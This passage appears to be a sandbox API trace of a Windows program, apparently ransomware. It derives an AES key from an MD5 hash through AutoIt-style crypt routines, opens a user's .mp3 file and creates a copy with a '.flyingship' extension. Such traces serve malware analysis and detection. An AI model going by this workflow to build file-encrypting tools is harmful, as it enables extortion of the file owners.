lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0185.449] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0185.449] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0185.449] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0185.450] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0185.450] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.450] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x301269d0, ftCreationTime.dwHighDateTime=0x1d5e55d, ftLastAccessTime.dwLowDateTime=0xda3bfd50, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0xda3bfd50, ftLastWriteTime.dwHighDateTime=0x1d5d7d8, nFileSizeHigh=0x0, nFileSizeLow=0x7f10, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="HdCQAGk.mp3", cAlternateFileName="")) returned 0x90af58 [0185.450] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0185.450] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.450] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.450] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.450] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.450] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0185.450] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.450] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0185.451] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.451] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.451] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0185.451] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.451] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.451] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.451] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.451] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.451] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0185.451] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.451] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0185.452] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.452] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.452] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0185.453] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.453] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.453] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.453] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.453] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.453] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.453] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.453] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.453] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.453] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.453] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.453] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.453] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0185.453] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.453] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.453] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.453] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.453] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.453] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0185.453] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.453] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.454] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.454] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.454] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.454] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.454] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.454] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.454] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.454] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.454] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.454] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.454] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.454] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0185.454] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.454] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.454] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.454] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.454] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0185.454] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.454] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.455] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.455] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.455] CryptHashData (hHash=0x90ae18, pbData=0x8dedf8, dwDataLen=0x19, dwFlags=0x1) returned 1 [0185.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.455] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.455] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.455] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.455] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.455] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0185.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.455] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.456] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0185.456] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.456] CryptDestroyHash (hHash=0x90ae18) returned 1 [0185.456] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.456] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.456] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.456] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.456] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.457] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\hdcqagk.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0185.457] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.457] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0185.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0185.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0185.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0185.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0185.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0185.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0185.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.458] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0185.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0185.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0185.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0185.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0185.458] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0185.458] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0185.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0185.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0185.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0185.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0185.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0185.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0185.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0185.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x8feba8 [0185.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0185.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0185.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0185.460] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l")) returned 0x10 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0185.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0185.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0185.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0185.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0185.461] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.flyingship.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\hdcqagk.flyingship.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0185.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0185.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0185.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0185.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0185.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 